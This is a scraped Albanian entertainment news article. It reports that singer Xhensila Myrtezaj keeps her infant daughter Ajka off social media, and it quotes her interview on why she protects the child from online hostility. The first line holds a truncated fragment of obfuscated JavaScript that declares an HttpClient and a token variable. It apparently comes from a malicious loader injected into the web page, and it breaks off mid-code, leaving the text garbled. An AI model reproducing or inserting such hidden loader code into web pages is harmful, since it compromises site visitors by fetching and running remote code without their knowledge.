;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Asnjë fotografi me Ajkën në rrjete sociale, Xhensila Myrtazaj rrëfen pse s’e ekspozon të bijën

By

Në muajin korrik të këtij viti, këngëtarja e njohur Xhensila Myrtezaj dhe aktori i humorit Bes Kallaku u bënë prindër për herë të parë. Xhensila solli në jetë një vajzë që çifti vendosi t’ia vërë emrin e veçantë, Ajka.

Mirëpo që nga lindja e vajzës, dyshja kanë qenë tepër diskretë dhe të kujdesshëm duke mos publikuar as edhe një imazh të saj.

View this post on Instagram

💜

A post shared by Xhensila Myrtezaj (@xhensilamyrtezaj) on

Madje edhe në njoftimin që dhanë në rrjete sociale se janë bërë prindër, ata zgjodhën të publikojnë një imazh të këmbëve të vockla të saj, kurse Bes Kallaku i fshehu fytyrën kur e publikoi një fotografi me të bijën në ditën e Krishtlindjeve.

Dhe ka një arsye pse Xhensila nuk do që ta ekspozojë vajzën, e këtë e ka treguar në një intervistë për Revistën Class.

“Kjo është nga të vetmet intervista ku unë flas për vajzën, pasi ajo është e shenjtë për mua, në boten dhe ditët e errëta ku jetojmë që njerëzit janë të etur për ca like apo material për të ushqyer veten dhe të mbushin me të pavërteta. Aq më tepër për shumë të tjerë që fshihen pas një tableti apo celulari, dhe janë vetëm dashakeqë, të gatshëm për të komentuar negativisht edhe për të mirën më të madhe. Kjo është një nga arsyet përse nuk dua të flas për të, pasi është e kulluara dhe e pastra në sytë e mi. Nuk do të mjaftonte jo vetëm kjo intervistë, por krejt jeta ime për të folur për atë çka unë kam ndjerë në këto pesë muaj. Mendoj se çdo nënë ma kupton ndjesinë protektive që unë kam! Në të ardhmen edhe mund të zbutet, por tani jam “kujdes kafshon” kur bëhet fjalë për bijën time.”- ka rrëfyer këngëtarja.

Artikuj të ngjashëm